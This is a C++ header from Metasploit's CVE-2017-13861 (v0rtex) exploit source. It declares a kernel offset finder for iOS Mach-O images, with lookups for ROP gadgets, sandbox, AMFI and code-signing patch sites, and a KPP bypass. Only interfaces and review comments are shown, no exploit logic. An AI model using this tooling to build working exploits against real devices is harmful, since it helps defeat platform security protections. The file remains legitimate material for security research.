GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/exploits/CVE-2017-13861/liboffsetfinder64/liboffsetfinder64.hpp
//
// offsetfinder64.hpp
// offsetfinder64
//
// Created by tihmstar on 10.01.18.
// Copyright © 2018 tihmstar. All rights reserved.
//
#ifndef offsetfinder64_hpp
#define offsetfinder64_hpp
#include <string>
#include <stdint.h>
#include <mach-o/loader.h>
#include <mach-o/nlist.h>
#include <mach-o/dyld_images.h>
#include <vector>
#include <functional>
#include <stdlib.h>
#include "common.h"
#include "insn.hpp"
#include "exception.hpp"
#include "patch.hpp"
namespace tihmstar {
// Declares a finder for addresses, structure offsets and patch sites inside a
// 64-bit Mach-O kernel image held in memory. Only the interface is visible here;
// every member's implementation lives in the matching .cpp and is not shown.
class offsetfinder64 {
public:
    // Three-valued flag so "not determined yet" can be told apart from a real
    // true/false (used for _haveSymtab and the haveSymbols constructor argument).
    enum tristate{
        kfalse = 0,
        ktrue = 1,
        kuninitialized = 2
    };
private:
    bool _freeKernel;       // presumably whether the destructor must release _kdata — confirm in ~offsetfinder64()
    bool _kernelIsSlid;     // NOTE(review): looks like "locations already include _kslide" — confirm against the .cpp
    uint64_t _kslide;       // kernel slide; both constructors accept a kslide argument
    uint8_t *_kdata;        // raw pointer to the image bytes; handed out read-only through kdata()
    size_t _ksize;          // length of the buffer behind _kdata, in bytes
    patchfinder64::loc_t _kernel_entry;   // presumably cached result for find_entry() — confirm
    patchfinder64::loc_t _kernel_base;    // presumably cached result for find_base() — confirm
    std::vector<patchfinder64::text_t> _segments;   // returned by reference from segments(); presumably populated by loadSegments()
    tristate _haveSymtab = kuninitialized;          // cache for haveSymbols(); kuninitialized until first resolved

    // NOTE(review): identifiers beginning with a double underscore are reserved
    // to the implementation in C++; this one works in practice but is technically ill-formed.
    struct symtab_command *__symtab;
    void loadSegments();
    // Forced inline; returns the LC_SYMTAB command of the image (null-ness on a
    // symbol-less image is decided in the .cpp, not visible here).
    __attribute__((always_inline)) struct symtab_command *getSymtab();

public:
    // Build a finder from an image on disk. kslide defaults to 0 and symbol
    // availability to "unknown", to be resolved lazily.
    // NOTE(review): not `explicit`, so a bare const char* converts to
    // offsetfinder64 implicitly when only the first argument is given.
    offsetfinder64(const char *filename, uint64_t kslide = 0, tristate haveSymbols = kuninitialized);
    // Build a finder over an image already in memory (`size` bytes at `buf`).
    // Whether the object takes ownership of `buf` is not visible from this
    // header — see how _freeKernel is set in the .cpp before relying on either.
    offsetfinder64(void* buf, size_t size, uint64_t kslide, tristate haveSymbols = kfalse);
    // Read-only view of the image bytes (the _kdata buffer).
    const void *kdata();
    patchfinder64::loc_t find_entry();
    patchfinder64::loc_t find_base();
    // Returns a reference to the internal segment list; the reference is only
    // valid while this object is alive.
    const std::vector<patchfinder64::text_t> &segments(){return _segments;};
    // Whether the image carries a symbol table usable by find_sym() (cached in _haveSymtab).
    bool haveSymbols();

    // Search the image for the byte pattern `little` of length `little_len`;
    // mirrors the libc memmem() naming but the haystack is implicit (the image).
    patchfinder64::loc_t memmem(const void *little, size_t little_len);
    // Read the 64-bit value stored at `pos` in the image (bounds handling lives in the .cpp).
    uint64_t deref(patchfinder64::loc_t pos);

    // Resolve a symbol by name; presumably requires haveSymbols() — confirm in the .cpp.
    patchfinder64::loc_t find_sym(const char *sym);
    patchfinder64::loc_t find_syscall0();
    // Statically recover the value register `reg` holds when execution reaches
    // `where`; `startAddr` (0 = unspecified) presumably bounds where the scan begins — confirm.
    uint64_t find_register_value(patchfinder64::loc_t where, int reg, patchfinder64::loc_t startAddr = 0);

    /*------------------------ v0rtex -------------------------- */
    // Kernel locations and structure offsets consumed by the v0rtex stage.
    // By signature: loc_t results are image locations, uint32_t results appear
    // to be offsets/sizes (e.g. find_sizeof_task) rather than addresses.
    patchfinder64::loc_t find_zone_map();
    patchfinder64::loc_t find_kernel_map();
    patchfinder64::loc_t find_kernel_task();
    patchfinder64::loc_t find_realhost();
    patchfinder64::loc_t find_bzero();
    patchfinder64::loc_t find_bcopy();
    patchfinder64::loc_t find_copyout();
    patchfinder64::loc_t find_copyin();
    patchfinder64::loc_t find_ipc_port_alloc_special();
    patchfinder64::loc_t find_ipc_kobject_set();
    patchfinder64::loc_t find_ipc_port_make_send();
    patchfinder64::loc_t find_chgproccnt();
    patchfinder64::loc_t find_kauth_cred_ref();
    patchfinder64::loc_t find_osserializer_serialize();
    uint32_t find_vtab_get_external_trap_for_index();
    uint32_t find_vtab_get_retain_count();
    uint32_t find_iouserclient_ipc();
    uint32_t find_ipc_space_is_task();
    uint32_t find_ipc_space_is_task_11();   // "_11" suffix: presumably the iOS 11 layout variant — confirm
    uint32_t find_proc_ucred();
    uint32_t find_task_bsd_info();
    uint32_t find_vm_map_hdr();
    uint32_t find_task_itk_self();
    uint32_t find_task_itk_registered();
    uint32_t find_sizeof_task();

    patchfinder64::loc_t find_rop_add_x0_x0_0x10();
    patchfinder64::loc_t find_rop_ldr_x0_x0_0x10();
    // Generic scan: returns the first location whose decoded instruction makes
    // `cmpfunc` return true. std::function is taken by value, so the predicate is copied.
    patchfinder64::loc_t find_exec(std::function<bool(patchfinder64::insn &i)>cmpfunc);


    /*------------------------ kernelpatches -------------------------- */
    // Each returns a patchfinder64::patch describing a site and its replacement
    // bytes (find_nosuid_off may yield several). The "_nosym" variants are, by
    // name, meant for images without a symbol table.
    patchfinder64::patch find_i_can_has_debugger_patch_off();
    patchfinder64::patch find_lwvm_patch_offsets();
    patchfinder64::patch find_remount_patch_offset();
    std::vector<patchfinder64::patch> find_nosuid_off();
    patchfinder64::patch find_proc_enforce();
    patchfinder64::patch find_amfi_patch_offsets();
    patchfinder64::patch find_cs_enforcement_disable_amfi();
    patchfinder64::patch find_amfi_substrate_patch();
    patchfinder64::patch find_sandbox_patch();
    patchfinder64::loc_t find_sbops();
    patchfinder64::patch find_nonceEnabler_patch();
    patchfinder64::patch find_nonceEnabler_patch_nosym();


    /*------------------------ KPP bypass -------------------------- */
    // Locations used by the KPP bypass stage; "_nosym" again denotes the
    // symbol-less lookup path.
    patchfinder64::loc_t find_gPhysBase();
    patchfinder64::loc_t find_gPhysBase_nosym();
    patchfinder64::loc_t find_kernel_pmap();
    patchfinder64::loc_t find_kernel_pmap_nosym();
    patchfinder64::loc_t find_cpacr_write();
    patchfinder64::loc_t find_idlesleep_str_loc();
    patchfinder64::loc_t find_deepsleep_str_loc();

    /*------------------------ Util -------------------------- */
    patchfinder64::loc_t find_rootvnode();
    patchfinder64::loc_t find_allproc();


    // Presumably frees _kdata when _freeKernel is set — confirm in the .cpp.
    // No copy/move members are declared, so the implicit ones would copy the raw
    // _kdata pointer; copying an instance is unsafe if it owns the buffer.
    ~offsetfinder64();
};
}
#endif /* offsetfinder64_hpp */